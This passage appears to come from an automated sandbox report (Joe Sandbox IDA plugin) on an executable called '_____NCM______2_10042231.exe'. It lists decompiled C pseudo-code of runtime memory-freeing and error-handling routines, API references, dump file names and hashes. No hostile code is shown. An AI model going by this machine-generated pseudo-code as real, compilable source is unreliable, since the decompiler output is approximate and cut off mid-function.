                                                                                        							_t25 = 0;
                                                                                        						}
                                                                                        						E10009811(_t25);
                                                                                        					}
                                                                                        				}
                                                                                        				if(_t27 != 0) {
                                                                                        					FreeEnvironmentStringsW(_t27);
                                                                                        				}
                                                                                        				return _t13;
                                                                                        			}












                                                                                        0x1000bcfe
                                                                                        0x1000bd04
                                                                                        0x1000bd5c
                                                                                        0x1000bd5c
                                                                                        0x1000bd06
                                                                                        0x1000bd07
                                                                                        0x1000bd0c
                                                                                        0x1000bd15
                                                                                        0x1000bd1b
                                                                                        0x1000bd21
                                                                                        0x1000bd26
                                                                                        0x00000000
                                                                                        0x1000bd28
                                                                                        0x1000bd2e
                                                                                        0x1000bd33
                                                                                        0x1000bd51
                                                                                        0x1000bd4b
                                                                                        0x1000bd4b
                                                                                        0x1000bd4d
                                                                                        0x1000bd4d
                                                                                        0x1000bd54
                                                                                        0x1000bd59
                                                                                        0x1000bd26
                                                                                        0x1000bd60
                                                                                        0x1000bd63
                                                                                        0x1000bd63
                                                                                        0x1000bd71

                                                                                        APIs
                                                                                        • GetEnvironmentStringsW.KERNEL32 ref: 1000BCF8
                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1000BD1B
                                                                                          • Part of subcall function 1000984B: HeapAlloc.KERNEL32(00000000,10002953,?,?,10003B25,?,?,00000000,00000000,?,100028A6,10002953,?,?,?,?), ref: 1000987D
                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 1000BD41
                                                                                        • _free.LIBCMT ref: 1000BD54
                                                                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 1000BD63
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000003.661084660.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                        • Associated: 00000000.00000003.373928207.000000001001D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000003.661074193.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000003.661103501.0000000010013000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000003.661115201.000000001001A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000003.661124775.000000001001C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_3_10000000______NCM______2_10042231.jbxd
                                                                                        Similarity
                                                                                        • API ID: ByteCharEnvironmentMultiStringsWide$AllocFreeHeap_free
                                                                                        • String ID:
                                                                                        • API String ID: 2278895681-0
                                                                                        • Opcode ID: 3775dec7b13f0e98472564a43fa27482bd00bc76d4f922a86c526cd47e8932f5
                                                                                        • Instruction ID: d5ec3faa45d4749e4cf6fe82870cb430d7caed18b6f788dda936944896235541
                                                                                        • Opcode Fuzzy Hash: 3775dec7b13f0e98472564a43fa27482bd00bc76d4f922a86c526cd47e8932f5
                                                                                        • Instruction Fuzzy Hash: E4018876601E157F73319A665C8CD7FABADDFC69E0311812AFD04D7219EE61DC0181B0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 82%
                                                                                        			E100094A4(void* __ecx) {
                                                                                        				void* __esi;
                                                                                        				intOrPtr _t2;
                                                                                        				void* _t4;
                                                                                        				void* _t10;
                                                                                        				void* _t11;
                                                                                        				void* _t13;
                                                                                        				void* _t15;
                                                                                        				long _t16;
                                                                                        
                                                                                        				_t11 = __ecx;
                                                                                        				_t16 = GetLastError();
                                                                                        				_t10 = 0;
                                                                                        				_t2 =  *0x1001a050; // 0xffffffff
                                                                                        				_t19 = _t2 - 0xffffffff;
                                                                                        				if(_t2 == 0xffffffff) {
                                                                                        					L2:
                                                                                        					_t15 = E1000AF17(_t11, 1, 0x364);
                                                                                        					_pop(_t13);
                                                                                        					if(_t15 != 0) {
                                                                                        						_t4 = E1000AC95(_t13, _t16, __eflags,  *0x1001a050, _t15);
                                                                                        						__eflags = _t4;
                                                                                        						if(_t4 != 0) {
                                                                                        							E10009266(_t13, _t15, 0x1001adb8);
                                                                                        							E10009811(_t10);
                                                                                        							__eflags = _t15;
                                                                                        							if(_t15 != 0) {
                                                                                        								goto L9;
                                                                                        							} else {
                                                                                        								goto L8;
                                                                                        							}
                                                                                        						} else {
                                                                                        							_push(_t15);
                                                                                        							goto L4;
                                                                                        						}
                                                                                        					} else {
                                                                                        						_push(_t10);
                                                                                        						L4:
                                                                                        						E10009811();
                                                                                        						L8:
                                                                                        						SetLastError(_t16);
                                                                                        					}
                                                                                        				} else {
                                                                                        					_t15 = E1000AC3F(_t11, _t16, _t19, _t2);
                                                                                        					if(_t15 != 0) {
                                                                                        						L9:
                                                                                        						SetLastError(_t16);
                                                                                        						_t10 = _t15;
                                                                                        					} else {
                                                                                        						goto L2;
                                                                                        					}
                                                                                        				}
                                                                                        				return _t10;
                                                                                        			}











                                                                                        0x100094a4
                                                                                        0x100094af
                                                                                        0x100094b1
                                                                                        0x100094b3
                                                                                        0x100094b8
                                                                                        0x100094bb
                                                                                        0x100094c9
                                                                                        0x100094d5
                                                                                        0x100094d8
                                                                                        0x100094db
                                                                                        0x100094ed
                                                                                        0x100094f2
                                                                                        0x100094f4
                                                                                        0x100094ff
                                                                                        0x10009505
                                                                                        0x1000950d
                                                                                        0x1000950f
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x100094f6
                                                                                        0x100094f6
                                                                                        0x00000000
                                                                                        0x100094f6
                                                                                        0x100094dd
                                                                                        0x100094dd
                                                                                        0x100094de
                                                                                        0x100094de
                                                                                        0x10009511
                                                                                        0x10009512
                                                                                        0x10009512
                                                                                        0x100094bd
                                                                                        0x100094c3
                                                                                        0x100094c7
                                                                                        0x1000951a
                                                                                        0x1000951b
                                                                                        0x10009521
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x100094c7
                                                                                        0x10009528

                                                                                        APIs
                                                                                        • GetLastError.KERNEL32(10002953,10002953,?,10009803,1000988E,?,?,10003B25,?,?,00000000,00000000,?,100028A6,10002953,?), ref: 100094A9
                                                                                        • _free.LIBCMT ref: 100094DE
                                                                                        • _free.LIBCMT ref: 10009505
                                                                                        • SetLastError.KERNEL32(00000000,?,10002953), ref: 10009512
                                                                                        • SetLastError.KERNEL32(00000000,?,10002953), ref: 1000951B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000003.661084660.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                        • Associated: 00000000.00000003.373928207.000000001001D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000003.661074193.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000003.661103501.0000000010013000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000003.661115201.000000001001A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000003.661124775.000000001001C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_3_10000000______NCM______2_10042231.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLast$_free
                                                                                        • String ID:
                                                                                        • API String ID: 3170660625-0
                                                                                        • Opcode ID: 6483985aa9492941bc04dd1288424dd14de216dad971419a12d1f9eaf1ff6de9
                                                                                        • Instruction ID: 04eb93e6a1ac583380ce6d91969c620c3a81a202d7f44d45d27db77bc928f591
                                                                                        • Opcode Fuzzy Hash: 6483985aa9492941bc04dd1288424dd14de216dad971419a12d1f9eaf1ff6de9
                                                                                        • Instruction Fuzzy Hash: 4E01A47A505A117BF213DB355CC6E4F27DEEBC76F27228124F9059625EEE30C9464260
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 100%
                                                                                        			E1000E73A(intOrPtr* _a4) {
                                                                                        				intOrPtr _t6;
                                                                                        				intOrPtr* _t21;
                                                                                        				void* _t23;
                                                                                        				void* _t24;
                                                                                        				void* _t25;
                                                                                        				void* _t26;
                                                                                        				void* _t27;
                                                                                        
                                                                                        				_t21 = _a4;
                                                                                        				if(_t21 != 0) {
                                                                                        					_t23 =  *_t21 -  *0x1001a700; // 0x1001a6f4
                                                                                        					if(_t23 != 0) {
                                                                                        						E10009811(_t7);
                                                                                        					}
                                                                                        					_t24 =  *((intOrPtr*)(_t21 + 4)) -  *0x1001a704; // 0x1001b230
                                                                                        					if(_t24 != 0) {
                                                                                        						E10009811(_t8);
                                                                                        					}
                                                                                        					_t25 =  *((intOrPtr*)(_t21 + 8)) -  *0x1001a708; // 0x1001b230
                                                                                        					if(_t25 != 0) {
                                                                                        						E10009811(_t9);
                                                                                        					}
                                                                                        					_t26 =  *((intOrPtr*)(_t21 + 0x30)) -  *0x1001a730; // 0x1001a6f8
                                                                                        					if(_t26 != 0) {
                                                                                        						E10009811(_t10);
                                                                                        					}
                                                                                        					_t6 =  *((intOrPtr*)(_t21 + 0x34));
                                                                                        					_t27 = _t6 -  *0x1001a734; // 0x1001b234
                                                                                        					if(_t27 != 0) {
                                                                                        						return E10009811(_t6);
                                                                                        					}
                                                                                        				}
                                                                                        				return _t6;
                                                                                        			}










                                                                                        0x1000e740
                                                                                        0x1000e745
                                                                                        0x1000e749
                                                                                        0x1000e74f
                                                                                        0x1000e752
                                                                                        0x1000e757
                                                                                        0x1000e75b
                                                                                        0x1000e761
                                                                                        0x1000e764
                                                                                        0x1000e769
                                                                                        0x1000e76d
                                                                                        0x1000e773
                                                                                        0x1000e776
                                                                                        0x1000e77b
                                                                                        0x1000e77f
                                                                                        0x1000e785
                                                                                        0x1000e788
                                                                                        0x1000e78d
                                                                                        0x1000e78e
                                                                                        0x1000e791
                                                                                        0x1000e797
                                                                                        0x00000000
                                                                                        0x1000e79f
                                                                                        0x1000e797
                                                                                        0x1000e7a2

                                                                                        APIs
                                                                                        • _free.LIBCMT ref: 1000E752
                                                                                          • Part of subcall function 10009811: HeapFree.KERNEL32(00000000,00000000,?,1000E7D1,?,00000000,?,00000000,?,1000E7F8,?,00000007,?,?,1000C606,?), ref: 10009827
                                                                                          • Part of subcall function 10009811: GetLastError.KERNEL32(?,?,1000E7D1,?,00000000,?,00000000,?,1000E7F8,?,00000007,?,?,1000C606,?,?), ref: 10009839
                                                                                        • _free.LIBCMT ref: 1000E764
                                                                                        • _free.LIBCMT ref: 1000E776
                                                                                        • _free.LIBCMT ref: 1000E788
                                                                                        • _free.LIBCMT ref: 1000E79A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000003.661084660.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                        • Associated: 00000000.00000003.373928207.000000001001D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000003.661074193.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000003.661103501.0000000010013000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000003.661115201.000000001001A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000003.661124775.000000001001C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_3_10000000______NCM______2_10042231.jbxd
                                                                                        Similarity
                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                        • String ID:
                                                                                        • API String ID: 776569668-0
                                                                                        • Opcode ID: 682790397018e01e4ce39a95d9df2a760b0a5ecaa0901eb84e455f7fb4a63b84
                                                                                        • Instruction ID: c39a0838d9256232bba108342d89aadc118fec22890c9e3b2fef81ceface58bb
                                                                                        • Opcode Fuzzy Hash: 682790397018e01e4ce39a95d9df2a760b0a5ecaa0901eb84e455f7fb4a63b84
                                                                                        • Instruction Fuzzy Hash: D7F0373150C2509BE640DB68EECAC0A73EDFB06BE0360C815F248E7649CA30FC828A60
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • _free.LIBCMT ref: 006CD9B3
                                                                                          • Part of subcall function 006C6C17: RtlFreeHeap.NTDLL(00000000,00000000,?,006C6996,00000000,00000000,018059B4,00000000,?,006B3319,009066E0,00000010), ref: 006C6C2D
                                                                                          • Part of subcall function 006C6C17: GetLastError.KERNEL32(00000000,?,006C6996,00000000,00000000,018059B4,00000000,?,006B3319,009066E0,00000010), ref: 006C6C3F
                                                                                        • _free.LIBCMT ref: 006CD9C5
                                                                                        • _free.LIBCMT ref: 006CD9D7
                                                                                        • _free.LIBCMT ref: 006CD9E9
                                                                                        • _free.LIBCMT ref: 006CD9FB
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.721377844.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.721360804.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.722085107.0000000000811000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.723189213.000000000090D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.723221613.0000000000913000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.723221613.0000000001313000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.731812655.00000000017F5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.731827637.00000000017F6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.731837813.00000000017FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.731837813.0000000001808000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.731860109.000000000180E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000______NCM______2_10042231.jbxd
                                                                                        Similarity
                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                        • String ID:
                                                                                        • API String ID: 776569668-0
                                                                                        • Opcode ID: d3c784034499db5f72d2362af9637779ce0607950c8adc4818e64b31deb91370
                                                                                        • Instruction ID: f45d3962cb36bd2973ae99ba550226f7b6605ae75bcab8584522cd59ec0c2392
                                                                                        • Opcode Fuzzy Hash: d3c784034499db5f72d2362af9637779ce0607950c8adc4818e64b31deb91370
                                                                                        • Instruction Fuzzy Hash: 48F03072518240AFC664EB68E986EBA73DFEA007607640C1EF465D7651DB30FCC09A78
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 91%
                                                                                        			E10008684(signed int __ecx) {
                                                                                        				intOrPtr _t7;
                                                                                        
                                                                                        				asm("lock xadd [eax], ecx");
                                                                                        				if((__ecx | 0xffffffff) == 0) {
                                                                                        					_t7 =  *0x1001a6e8; // 0x1001a4c8
                                                                                        					if(_t7 != 0x1001a4c8) {
                                                                                        						E10009811(_t7);
                                                                                        						 *0x1001a6e8 = 0x1001a4c8;
                                                                                        					}
                                                                                        				}
                                                                                        				E10009811( *0x1001adac);
                                                                                        				 *0x1001adac = 0;
                                                                                        				E10009811( *0x1001adb0);
                                                                                        				 *0x1001adb0 = 0;
                                                                                        				E10009811( *0x1001b200);
                                                                                        				 *0x1001b200 = 0;
                                                                                        				E10009811( *0x1001b204);
                                                                                        				 *0x1001b204 = 0;
                                                                                        				return 1;
                                                                                        			}




                                                                                        0x1000868d
                                                                                        0x10008691
                                                                                        0x10008693
                                                                                        0x1000869f
                                                                                        0x100086a2
                                                                                        0x100086a8
                                                                                        0x100086a8
                                                                                        0x1000869f
                                                                                        0x100086b4
                                                                                        0x100086c1
                                                                                        0x100086c7
                                                                                        0x100086d2
                                                                                        0x100086d8
                                                                                        0x100086e3
                                                                                        0x100086e9
                                                                                        0x100086f1
                                                                                        0x100086fa

                                                                                        APIs
                                                                                        • _free.LIBCMT ref: 100086A2
                                                                                          • Part of subcall function 10009811: HeapFree.KERNEL32(00000000,00000000,?,1000E7D1,?,00000000,?,00000000,?,1000E7F8,?,00000007,?,?,1000C606,?), ref: 10009827
                                                                                          • Part of subcall function 10009811: GetLastError.KERNEL32(?,?,1000E7D1,?,00000000,?,00000000,?,1000E7F8,?,00000007,?,?,1000C606,?,?), ref: 10009839
                                                                                        • _free.LIBCMT ref: 100086B4
                                                                                        • _free.LIBCMT ref: 100086C7
                                                                                        • _free.LIBCMT ref: 100086D8
                                                                                        • _free.LIBCMT ref: 100086E9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000003.661084660.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                        • Associated: 00000000.00000003.373928207.000000001001D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000003.661074193.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000003.661103501.0000000010013000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000003.661115201.000000001001A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000003.661124775.000000001001C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_3_10000000______NCM______2_10042231.jbxd
                                                                                        Similarity
                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                        • String ID:
                                                                                        • API String ID: 776569668-0
                                                                                        • Opcode ID: 91d09662a3af697a83fb4e33666fde7cae0b60d56a6550fd7462af9ada438dea
                                                                                        • Instruction ID: d789f296e27733ed1a5efe5ac6368ee0ab3e43fc847217ac74486c71df527e35
                                                                                        • Opcode Fuzzy Hash: 91d09662a3af697a83fb4e33666fde7cae0b60d56a6550fd7462af9ada438dea
                                                                                        • Instruction Fuzzy Hash: B2F0FE78405A319BFB42EF14ACC54493BE4F707B71306C116F52557379CB3599828F91
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 88%
                                                                                        			E10007F10(void* __ecx, void* __edx, intOrPtr _a4) {
                                                                                        				signed int _v8;
                                                                                        				void* _v12;
                                                                                        				char _v16;
                                                                                        				void* __ebx;
                                                                                        				void* __edi;
                                                                                        				void* __esi;
                                                                                        				intOrPtr* _t36;
                                                                                        				struct HINSTANCE__* _t37;
                                                                                        				struct HINSTANCE__* _t43;
                                                                                        				intOrPtr* _t44;
                                                                                        				intOrPtr* _t45;
                                                                                        				CHAR* _t49;
                                                                                        				struct HINSTANCE__* _t50;
                                                                                        				void* _t52;
                                                                                        				struct HINSTANCE__* _t55;
                                                                                        				intOrPtr* _t59;
                                                                                        				struct HINSTANCE__* _t64;
                                                                                        				intOrPtr _t65;
                                                                                        
                                                                                        				_t52 = __ecx;
                                                                                        				if(_a4 == 2 || _a4 == 1) {
                                                                                        					E1000B8FC(_t52);
                                                                                        					GetModuleFileNameA(0, 0x1001ac70, 0x104);
                                                                                        					_t49 =  *0x1001b208; // 0x19e3410
                                                                                        					 *0x1001b210 = 0x1001ac70;
                                                                                        					if(_t49 == 0 ||  *_t49 == 0) {
                                                                                        						_t49 = 0x1001ac70;
                                                                                        					}
                                                                                        					_v8 = 0;
                                                                                        					_v16 = 0;
                                                                                        					E10008034(_t52, _t49, 0, 0,  &_v8,  &_v16);
                                                                                        					_t64 = E100081A9(_v8, _v16, 1);
                                                                                        					if(_t64 != 0) {
                                                                                        						E10008034(_t52, _t49, _t64, _t64 + _v8 * 4,  &_v8,  &_v16);
                                                                                        						if(_a4 != 1) {
                                                                                        							_v12 = 0;
                                                                                        							_push( &_v12);
                                                                                        							_t50 = E1000B417(_t49, 0, _t64, _t64);
                                                                                        							if(_t50 == 0) {
                                                                                        								_t59 = _v12;
                                                                                        								_t55 = 0;
                                                                                        								_t36 = _t59;
                                                                                        								if( *_t59 == 0) {
                                                                                        									L15:
                                                                                        									_t37 = 0;
                                                                                        									 *0x1001b1fc = _t55;
                                                                                        									_v12 = 0;
                                                                                        									_t50 = 0;
                                                                                        									 *0x1001b200 = _t59;
                                                                                        									L16:
                                                                                        									E10009811(_t37);
                                                                                        									_v12 = 0;
                                                                                        									goto L17;
                                                                                        								} else {
                                                                                        									goto L14;
                                                                                        								}
                                                                                        								do {
                                                                                        									L14:
                                                                                        									_t36 = _t36 + 4;
                                                                                        									_t55 =  &(_t55->i);
                                                                                        								} while ( *_t36 != 0);
                                                                                        								goto L15;
                                                                                        							}
                                                                                        							_t37 = _v12;
                                                                                        							goto L16;
                                                                                        						}
                                                                                        						 *0x1001b1fc = _v8 - 1;
                                                                                        						_t43 = _t64;
                                                                                        						_t64 = 0;
                                                                                        						 *0x1001b200 = _t43;
                                                                                        						goto L10;
                                                                                        					} else {
                                                                                        						_t44 = E100097FE();
                                                                                        						_push(0xc);
                                                                                        						_pop(0);
                                                                                        						 *_t44 = 0;
                                                                                        						L10:
                                                                                        						_t50 = 0;
                                                                                        						L17:
                                                                                        						E10009811(_t64);
                                                                                        						return _t50;
                                                                                        					}
                                                                                        				} else {
                                                                                        					_t45 = E100097FE();
                                                                                        					_t65 = 0x16;
                                                                                        					 *_t45 = _t65;
                                                                                        					E100061CF();
                                                                                        					return _t65;
                                                                                        				}
                                                                                        			}





















                                                                                        0x10007f10
                                                                                        0x10007f1d
                                                                                        0x10007f3d
                                                                                        0x10007f50
                                                                                        0x10007f56
                                                                                        0x10007f5c
                                                                                        0x10007f64
                                                                                        0x10007f6b
                                                                                        0x10007f6b
                                                                                        0x10007f70
                                                                                        0x10007f77
                                                                                        0x10007f7e
                                                                                        0x10007f90
                                                                                        0x10007f97
                                                                                        0x10007fb6
                                                                                        0x10007fc2
                                                                                        0x10007fdd
                                                                                        0x10007fe0
                                                                                        0x10007fe7
                                                                                        0x10007fed
                                                                                        0x10007ff4
                                                                                        0x10007ff7
                                                                                        0x10007ff9
                                                                                        0x10007ffd
                                                                                        0x10008007
                                                                                        0x10008007
                                                                                        0x10008009
                                                                                        0x1000800f
                                                                                        0x10008012
                                                                                        0x10008014
                                                                                        0x1000801a
                                                                                        0x1000801b
                                                                                        0x10008021
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x10007fff
                                                                                        0x10007fff
                                                                                        0x10007fff
                                                                                        0x10008002
                                                                                        0x10008003
                                                                                        0x00000000
                                                                                        0x10007fff
                                                                                        0x10007fef
                                                                                        0x00000000
                                                                                        0x10007fef
                                                                                        0x10007fc8
                                                                                        0x10007fcd
                                                                                        0x10007fcf
                                                                                        0x10007fd1
                                                                                        0x00000000
                                                                                        0x10007f99
                                                                                        0x10007f99
                                                                                        0x10007f9e
                                                                                        0x10007fa0
                                                                                        0x10007fa1
                                                                                        0x10007fd6
                                                                                        0x10007fd6
                                                                                        0x10008024
                                                                                        0x10008025
                                                                                        0x00000000
                                                                                        0x1000802e
                                                                                        0x10007f25
                                                                                        0x10007f25
                                                                                        0x10007f2c
                                                                                        0x10007f2d
                                                                                        0x10007f2f
                                                                                        0x00000000
                                                                                        0x10007f34

                                                                                        APIs
                                                                                        • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\_____NCM______2_10042231.exe,00000104), ref: 10007F50
                                                                                        • _free.LIBCMT ref: 1000801B
                                                                                        • _free.LIBCMT ref: 10008025
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000003.661084660.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                        • Associated: 00000000.00000003.373928207.000000001001D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000003.661074193.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000003.661103501.0000000010013000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000003.661115201.000000001001A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000003.661124775.000000001001C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_3_10000000______NCM______2_10042231.jbxd
                                                                                        Similarity
                                                                                        • API ID: _free$FileModuleName
                                                                                        • String ID: C:\Users\user\Desktop\_____NCM______2_10042231.exe
                                                                                        • API String ID: 2506810119-3153913036
                                                                                        • Opcode ID: 18304918f889752771161f65a871ad065420f741bc7226910299b533d886e305
                                                                                        • Instruction ID: 7936cabdbc9714119c0bb3ab282643236399eb9151b5b5f586ebe6c93e3e9682
                                                                                        • Opcode Fuzzy Hash: 18304918f889752771161f65a871ad065420f741bc7226910299b533d886e305
                                                                                        • Instruction Fuzzy Hash: 9131BF71E00259AFEB21DF998C849AEBBECFF85390F108066F80897215DB749F44CB90
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • CloseHandle.KERNEL32(00000000,00000000,?,006B3441,00000000), ref: 006B3387
                                                                                        • FreeLibrary.KERNEL32(00000000,00000000,?,006B3441,00000000), ref: 006B3396
                                                                                        • _free.LIBCMT ref: 006B339D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.721377844.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.721360804.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.722085107.0000000000811000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.723189213.000000000090D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.723221613.0000000000913000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.723221613.0000000001313000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.731812655.00000000017F5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.731827637.00000000017F6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.731837813.00000000017FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.731837813.0000000001808000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.731860109.000000000180E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000______NCM______2_10042231.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseFreeHandleLibrary_free
                                                                                        • String ID: A4k
                                                                                        • API String ID: 621396759-4015224258
                                                                                        • Opcode ID: eff34d15ab3a30c5b4bdf81fba0d0a3adc56e00eb540c06dedad2acec0edd33d
                                                                                        • Instruction ID: a5bb14a324c5b0ca9a66b4978f676edc06428dcf34faccdfef3369f72783270a
                                                                                        • Opcode Fuzzy Hash: eff34d15ab3a30c5b4bdf81fba0d0a3adc56e00eb540c06dedad2acec0edd33d
                                                                                        • Instruction Fuzzy Hash: 76E04F721017609FCB215B05D80CFD7BBEAEF40721F05C119E55A52660CB35ADD0CB94
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 75%
                                                                                        			E10009C8F(void* __edx, signed int* _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, signed int _a28, intOrPtr _a32, intOrPtr _a36) {
                                                                                        				signed int _v8;
                                                                                        				signed int _v12;
                                                                                        				signed int _v16;
                                                                                        				unsigned int _v20;
                                                                                        				signed int _v28;
                                                                                        				signed int _v32;
                                                                                        				signed int _v36;
                                                                                        				char _v40;
                                                                                        				intOrPtr _v48;
                                                                                        				char _v52;
                                                                                        				void* __ebx;
                                                                                        				void* __edi;
                                                                                        				void* _t86;
                                                                                        				signed int _t92;
                                                                                        				signed int _t93;
                                                                                        				signed int _t94;
                                                                                        				signed int _t100;
                                                                                        				void* _t101;
                                                                                        				void* _t102;
                                                                                        				void* _t104;
                                                                                        				void* _t107;
                                                                                        				void* _t109;
                                                                                        				void* _t111;
                                                                                        				void* _t115;
                                                                                        				char* _t116;
                                                                                        				void* _t119;
                                                                                        				signed int _t121;
                                                                                        				signed int _t128;
                                                                                        				signed int* _t129;
                                                                                        				signed int _t136;
                                                                                        				signed int _t137;
                                                                                        				char _t138;
                                                                                        				signed int _t139;
                                                                                        				signed int _t142;
                                                                                        				signed int _t146;
                                                                                        				signed int _t151;
                                                                                        				char _t156;
                                                                                        				char _t157;
                                                                                        				void* _t161;
                                                                                        				unsigned int _t162;
                                                                                        				signed int _t164;
                                                                                        				signed int _t166;
                                                                                        				signed int _t170;
                                                                                        				void* _t171;
                                                                                        				signed int* _t172;
                                                                                        				signed int _t174;
                                                                                        				signed int _t181;
                                                                                        				signed int _t182;
                                                                                        				signed int _t183;
                                                                                        				signed int _t184;
                                                                                        				signed int _t185;
                                                                                        				signed int _t186;
                                                                                        				signed int _t187;
                                                                                        
                                                                                        				_t171 = __edx;
